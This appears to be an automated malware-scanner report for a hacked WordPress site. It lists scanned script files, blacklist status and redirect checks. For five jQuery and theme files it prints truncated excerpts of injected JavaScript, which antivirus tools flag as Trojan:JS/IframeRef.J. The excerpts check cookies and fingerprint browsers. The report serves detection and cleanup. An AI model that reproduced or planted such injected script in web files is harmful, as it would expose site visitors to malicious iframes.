Malware Scanner report for globalmanofleisure.com

Malicious/Suspicious/Total urls checked: 5/0/15

5 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "globalmanofleisure.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/5

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=globalmanofleisure.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://globalmanofleisure.com/	500 timeout Content-Length: 30 Content-Type: text/plain	clean
http://globalmanofleisure.com/test404page.js	404 Not Found Content-Length: 13427 Content-Type: text/html	clean
http://globalmanofleisure.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=3.9.3	200 OK Content-Length: 33 Content-Type: application/javascript	clean
http://globalmanofleisure.com/wp-includes/js/jquery/jquery.js?ver=1.11.0	200 OK Content-Length: 97380 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^\|; )"+a.replace(/([\.$?\|{}\[\]\\\/\+^])/g,"\\$1")+"=([^;])"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo ... 3127 bytes are skipped ...e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var fd=a.jQuery,gd=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=gd),b&&a.jQuery===n&&(a.jQuery=fd),n},typeof b===L&&(a.jQuery=a.$=n),n}); jQuery.noConflict(); Antivirus reports: Microsoft Trojan:JS/IframeRef.J
http://globalmanofleisure.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1	200 OK Content-Length: 8178 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^\|; )"+a.replace(/([\.$?\|{}\[\]\\\/\+^])/g,"\\$1")+"=([^;])"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo ... 3221 bytes are skipped ...ector\|\|"**",n),this)},e.event.trigger=function(e,t,n,a){return n\|\|C.test(e)\|\|r("Global events are undocumented and deprecated"),k.call(this,e,t,n\|\|document,a)},e.each(S.split("\|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window); Antivirus reports: Microsoft Trojan:JS/IframeRef.J
http://globalmanofleisure.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=3.9.3	200 OK Content-Length: 24995 Content-Type: application/javascript	clean
http://globalmanofleisure.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=3.9.3	200 OK Content-Length: 5337 Content-Type: application/javascript	clean
http://globalmanofleisure.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=3.9.3	200 OK Content-Length: 891 Content-Type: application/javascript	clean
http://globalmanofleisure.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.js?ver=3.9.3	200 OK Content-Length: 890 Content-Type: application/javascript	clean
http://globalmanofleisure.com/wp-content/themes/Origin/js/jquery.fitvids.js?ver=1.0	200 OK Content-Length: 3702 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^\|; )"+a.replace(/([\.$?\|{}\[\]\\\/\+^])/g,"\\$1")+"=([^;])"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo ... 2398 bytes are skipped ...\|\| $this.parent('.fluid-width-video-wrapper').length) { return; } var height = this.tagName.toLowerCase() == 'object' ? $this.attr('height') : $this.height(), aspectRatio = height / $this.width(); $this.wrap('<div class="fluid-width-video-wrapper" />').parent('.fluid-width-video-wrapper').css('padding-top', (aspectRatio * 100)+"%"); $this.removeAttr('height').removeAttr('width'); }); }); } })( jQuery ); Antivirus reports: Microsoft Trojan:JS/IframeRef.J
http://globalmanofleisure.com/wp-content/themes/Origin/js/jquery.infinitescroll.min.js?ver=1.0	200 OK Content-Length: 21940 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^\|; )"+a.replace(/([\.$?\|{}\[\]\\\/\+^])/g,"\\$1")+"=([^;])"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo ... 3052 bytes are skipped ...,H)}}});break}return this};var x=i.event,s;x.special.smartscroll={setup:function(){i(this).bind("scroll",x.special.smartscroll.handler)},teardown:function(){i(this).unbind("scroll",x.special.smartscroll.handler)},handler:function(G,D){var F=this,E=arguments;G.type="smartscroll";if(s){clearTimeout(s)}s=setTimeout(function(){i.event.handle.apply(F,E)},D==="execAsap"?0:100)}};i.fn.smartscroll=function(D){return D?this.bind("smartscroll",D):this.trigger("smartscroll",["execAsap"])}})(window,jQuery); Antivirus reports: Microsoft Trojan:JS/IframeRef.J
http://globalmanofleisure.com/wp-content/themes/Origin/js/custom.js?ver=1.0	200 OK Content-Length: 5154 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^\|; )"+a.replace(/([\.$?\|{}\[\]\\\/\+^])/g,"\\$1")+"=([^;])"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo ... 3427 bytes are skipped ...0, function(){ $(this).css( { 'top' : '-24px', 'opacity' : '1' } ).animate( { 'top' : '9px' }, 150 ); } ); } ); $('#ie8 .image-info').css( 'opacity', '0' ); if ( $('#ie8 .image-info').length ){ $('.entry-image').hover( function(){ $(this).find('.image-info').css( 'opacity', '1' ); }, function(){ $(this).find('.image-info').css( 'opacity', '0' ); } ); } }; }); })(jQuery) Antivirus reports: Microsoft Trojan:JS/IframeRef.J
http://globalmanofleisure.com/wp-content/themes/Origin/epanel/page_templates/js/fancybox/jquery.easing-1.3.pack.js?ver=1.3.4	200 OK Content-Length: 6717 Content-Type: application/javascript	clean
http://globalmanofleisure.com/wp-content/themes/Origin/epanel/page_templates/js/fancybox/jquery.fancybox-1.3.4.pack.js?ver=1.3.4	200 OK Content-Length: 15647 Content-Type: application/javascript	clean
http://globalmanofleisure.com/wp-content/themes/Origin/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1	200 OK Content-Length: 4777 Content-Type: application/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: globalmanofleisure.com

Result:
HTTP/1.1 500 timeout
Content-Type: text/plain

Second query (visit from search engine):
GET / HTTP/1.1
Host: globalmanofleisure.com
Referer: http://www.google.com/search?q=globalmanofleisure.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for globalmanofleisure.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools